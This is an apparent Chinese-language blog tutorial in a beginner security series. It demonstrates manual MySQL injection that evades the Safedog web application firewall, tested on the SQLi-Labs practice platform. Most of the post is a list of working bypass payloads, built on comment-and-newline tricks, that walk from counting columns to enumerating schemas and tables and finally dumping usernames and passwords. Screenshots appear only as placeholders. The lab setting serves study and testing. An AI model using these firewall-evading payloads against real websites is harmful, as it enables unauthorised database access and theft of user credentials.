从0到1学习网络安全 【MySql手工注入过狗】

MySql手工注入过狗

注：今后继续定期更新---“实战”！

---

Step1：环境搭建

这个环境是在我本机上搭的，其他环境可以去Https://www.bug1024.cn直接搞！

---

Step2：过狗流程

用SQLi-Labs SQL注入练习平台这个环境测试的，网站安全狗版本：

image.png

过狗Payload：

?id=-1' order-- x%0A by 3 -- +  
?id=-1' UNION-- x%0ASELECT  1,2,3 -- +  
?id=-1' UNION-- x%0ASELECT  1,database(-- x%0a),3-- +   
?id=-1' UNION-- x%0ASELECT~ 1,schema_name,3 from information_schema.schemata limit 0,1-- +  
?id=-1' UNION-- x%0ASELECT~ 1,table_name,3 from information_schema.tables where table_schema=0x7365637572697479 limit 0,1 -- +  
?id=-1' UNION-- x%0ASELECT~ 1,column_name,3 from information_schema.columns where table_schema=0x7365637572697479 and-- ~%0A table_name=0x7573657273 limit 0,1 -- + 
?id=-1' UNION-- x%0ASELECT~ 1,username,password from security.users limit 0,1 -- +  

下面验证一下：

1、查字段数：

image.png

2、查显示位：

image.png

3、查当前数据库：

image.png

4、查其他数据库：

image.png

5、查对应数据表：

image.png

6、查对应字段名：

image.png

7、Bypass：

image.png

不知道自己安装的是不是假狗，大佬勿喷

---

由于小编也在学习中，写的不好各位勿喷。
从0到1学习网络安全 【目录】

实战环境地址群内公布！！！

白帽交流群 【简介】
感谢大家支持。